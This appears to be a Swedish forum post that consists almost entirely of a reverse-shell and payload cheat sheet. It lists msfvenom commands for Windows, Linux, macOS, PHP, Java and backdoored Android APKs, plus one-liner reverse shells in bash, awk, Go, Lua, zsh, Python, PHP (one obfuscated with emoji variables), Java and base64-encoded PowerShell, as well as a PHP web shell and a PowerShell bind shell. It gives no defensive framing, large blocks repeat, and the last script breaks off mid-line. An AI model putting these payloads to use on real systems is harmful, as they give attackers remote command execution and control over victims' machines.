__________________
Senast redigerad av 0xgh64 2022-12-03 kl. 01:36.
Senast redigerad av 0xgh64 2022-12-03 kl. 01:36.
php -r '$😀="1";$ðŸ˜="2";$😅="3";$😆="4";$😉="5";$😊="6";$😎="7";$ðŸ˜="8";$😚="9";$🙂="0";$🤢=" ";$🤓="<";$🤠=">";$😱="-";$😵="&";$🤩="i";$🤔=".";$🤨="/";$🥰="a";$ðŸ˜="b";$😶="i";$🙄="h";$😂="c";$🤣="d";$😃="e";$😄="f";$😋="k";$😘="n";$😗="o";$😙="p";$🤗="s";$😑="x";$💀 = $😄. $🤗. $😗. $😂. $😋. $😗. $😙. $😃. $😘;$🚀 = "ip-address";$💻 = port;$🚠= "sh". $🤢. $😱. $🤩. $🤢. $🤓. $😵. $😅. $🤢. $🤠. $😵. $😅. $🤢. $ðŸ˜. $🤠. $😵. $😅;$🤣 = $💀($🚀,$💻);$👽 = $😃. $😑. $😃. $😂;$👽($ðŸš);'
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f exe -o reverse.exe
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f exe -o reverse.exe
msfvenom -p windows/x64/shell/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f exe -o reverse.exe
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f elf -o reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f elf -o reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f elf -o reverse.elf
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '' -f python -v notBuf -o shellcode
msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f macho -o shell.macho
msfvenom -p osx/x64/shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f macho -o shell.macho
msfvenom -p php/meterpreter_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f raw -o shell.php
msfvenom -p php/reverse_php LHOST=xx.xx.xx.x LPORT=xxxx -o shell.php
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f raw -o shell.jsp
msfvenom -p java/shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f war -o shell.war
msfvenom --platform android -p android/meterpreter/reverse_tcp lhost=xx.xx.xx.x lport=xxxx R -o malicious.apk
msfvenom --platform android -x template-app.apk -p android/meterpreter/reverse_tcp lhost=xx.xx.xx.x lport=xxxx -o payload.apk
msfvenom -p cmd/unix/reverse_python LHOST=xx.xx.xx.x LPORT=xxxx -f raw
msfvenom -p cmd/unix/reverse_bash LHOST=xx.xx.xx.x LPORT=xxxx -f raw -o shell.sh
sh -i 5<> /dev/tcp/xx.xx.xx.xx/9001 0<&5 1>&5 2>&5
exec 5<>/dev/tcp/xx.xx.xx.xx/9001;cat <&5 | while read line; do $line 2>&5 >&5; done
0<&196;exec 196<>/dev/tcp/xx.xx.xx.xx/9001; sh <&196 >&196 2>&196
sh -i >& /dev/tcp/xx.xx.xx.xx/9001 0>&1
awk 'BEGIN {s = "/inet/tcp/0/xx.xx.xx.xx/9001";
while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
echo 'import os' > /tmp/t.v && echo 'fn main() { os.system("nc -e sh xx.xx.xx.xx 9001 0>&1") }' >> /tmp/t.v && v run /tmp/t.v && rm /tmp/t.v
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","xx.xx.xx.xx:9001");cmd:=exec.Command("sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
lua5.1 -e 'local host, port = "xx.xx.xx.xx", 9001 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
lua -e "require('socket');require('os');t=socket.tcp();t:connect('xx.xx.xx.xx','9001');os.execute('sh -i <&3 >&3 2>&3');"
zsh -c 'zmodload zsh/net/tcp && ztcp xx.xx.xx.xx 9001 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
TF=$(mktemp -u);mkfifo $TF && telnet xx.xx.xx.xx 9001 0<$TF | sh 1>$TF
String host="xx.xx.xx.xx";int port=9001;String cmd="sh";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
String command = "var host = 'xx.xx.xx.xx';" +
"var port = 9001;" +
"var cmd = 'sh';"+
"var s = new java.net.Socket(host, port);" +
"var p = new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();"+
"var pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();"+
"var po = p.getOutputStream(), so = s.getOutputStream();"+
"print ('Connected');"+
"while (!s.isClosed()) {"+
" while (pi.available() > 0)"+
" so.write(pi.read());"+
" while (pe.available() > 0)"+
" so.write(pe.read());"+
" while (si.available() > 0)"+
" po.write(si.read());"+
" so.flush();"+
" po.flush();"+
" java.lang.Thread.sleep(50);"+
" try {"+
" p.exitValue();"+
" break;"+
" }"+
" catch (e) {"+
" }"+
"}"+
"p.destroy();"+
"s.close();";
String x = "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\""+command+"\")";
ref.add(new StringRefAddr("x", x);
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("xx.xx.xx.xx",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xx.xx.xx.xx",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0 AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUA YQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABl AHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0A LgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAw ACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQA ZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABl AHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAA fAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAg ACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUA IAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAk AHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwA JABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBs AGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('xx.xx.xx.xx', 9001);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"
php -r '$sock=fsockopen("xx.xx.xx.xx",9001);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
php -r '$sock=fsockopen("xx.xx.xx.xx",9001);popen("sh <&3 >&3 2>&3", "r");'
php -r '$sock=fsockopen("xx.xx.xx.xx",9001);`sh <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("xx.xx.xx.xx",9001);passthru("sh <&3 >&3 2>&3");'
php -r '$sock=fsockopen("xx.xx.xx.xx",9001);system("sh <&3 >&3 2>&3");'
php -r '$sock=fsockopen("xx.xx.xx.xx",9001);shell_exec("sh <&3 >&3 2>&3");'
php -r '$sock=fsockopen("xx.xx.xx.xx",9001);exec("sh <&3 >&3 2>&3");'
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
php -r '$😀="1";$ðŸ˜="2";$😅="3";$😆="4";$😉="5";$😊="6";$😎="7";$ðŸ˜="8";$😚="9";$🙂="0";$🤢=" ";$🤓="<";$🤠=">";$😱="-";$😵="&";$🤩="i";$🤔=".";$🤨="/";$🥰="a";$ðŸ˜="b";$😶="i";$🙄="h";$😂="c";$🤣="d";$😃="e";$😄="f";$😋="k";$😘="n";$😗="o";$😙="p";$🤗="s";$😑="x";$💀 = $😄. $🤗. $😗. $😂. $😋. $😗. $😙. $😃. $😘;$🚀 = "ip-address";$💻 = port;$🚠= "sh". $🤢. $😱. $🤩. $🤢. $🤓. $😵. $😅. $🤢. $🤠. $😵. $😅. $🤢. $ðŸ˜. $🤠. $😵. $😅;$🤣 = $💀($🚀,$💻);$👽 = $😃. $😑. $😃. $😂;$👽($ðŸš);'
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f exe -o reverse.exe
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f exe -o reverse.exe
msfvenom -p windows/x64/shell/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f exe -o reverse.exe
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f elf -o reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f elf -o reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f elf -o reverse.elf
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '' -f python -v notBuf -o shellcode
msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.x LPORT=xxxx -f macho -o shell.macho
sh -i 5<> /dev/tcp/xx.xx.xx.xx/9001 0<&5 1>&5 2>&5
exec 5<>/dev/tcp/xx.xx.xx.xx/9001;cat <&5 | while read line; do $line 2>&5 >&5; done
0<&196;exec 196<>/dev/tcp/xx.xx.xx.xx/9001; sh <&196 >&196 2>&196
sh -i >& /dev/tcp/xx.xx.xx.xx/9001 0>&1
awk 'BEGIN {s = "/inet/tcp/0/xx.xx.xx.xx/9001";
while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
echo 'import os' > /tmp/t.v && echo 'fn main() { os.system("nc -e sh xx.xx.xx.xx 9001 0>&1") }' >> /tmp/t.v && v run /tmp/t.v && rm /tmp/t.v
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","xx.xx.xx.xx:9001");cmd:=exec.Command("sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
lua5.1 -e 'local host, port = "xx.xx.xx.xx", 9001 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
lua -e "require('socket');require('os');t=socket.tcp();t:connect('xx.xx.xx.xx','9001');os.execute('sh -i <&3 >&3 2>&3');"
zsh -c 'zmodload zsh/net/tcp && ztcp xx.xx.xx.xx 9001 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
TF=$(mktemp -u);mkfifo $TF && telnet xx.xx.xx.xx 9001 0<$TF | sh 1>$TF
String host="xx.xx.xx.xx";int port=9001;String cmd="sh";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
String command = "var host = 'xx.xx.xx.xx';" +
"var port = 9001;" +
"var cmd = 'sh';"+
"var s = new java.net.Socket(host, port);" +
"var p = new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();"+
"var pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();"+
"var po = p.getOutputStream(), so = s.getOutputStream();"+
"print ('Connected');"+
"while (!s.isClosed()) {"+
" while (pi.available() > 0)"+
" so.write(pi.read());"+
" while (pe.available() > 0)"+
" so.write(pe.read());"+
" while (si.available() > 0)"+
" po.write(si.read());"+
" so.flush();"+
" po.flush();"+
" java.lang.Thread.sleep(50);"+
" try {"+
" p.exitValue();"+
" break;"+
" }"+
" catch (e) {"+
" }"+
"}"+
"p.destroy();"+
"s.close();";
String x = "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\""+command+"\")";
ref.add(new StringRefAddr("x", x);
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("xx.xx.xx.xx",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
$listener = New-Object System.Net.Sockets.TcpListener 80
$listener.Start()
while ($true) {
$client = $listener.AcceptTcpClient()
$stream = $client.GetStream()
$reader = New-Object System.IO.StreamReader $stream
$writer = New-Object System.IO.StreamWriter $stream
$prompt = "PS > "
$writer.WriteLine("Pseudo Shell")
$writer.WriteLine("")
$writer.Write($prompt)
$writer.Flush()
while ($line = $reader.ReadLine()) {
if ($line -eq "exit") {
$writer.WriteLine("Exiting shell")
break
}
$output = Invoke-Expression $line
$writer.WriteLine($output)
$writer.Write($prompt)
$writer.Flush()
}
$client.Close()
}
while ($line = $reader.ReadLine()) {
if ($line -match "^upload") {
$filename = $line.Split(" ")[1]
$writer.WriteLine("Uploading $filename")
$contents = $reader.ReadToEnd()
$file = [System.IO.Path]::Combine
Du måste vara medlem för att kunna kommentera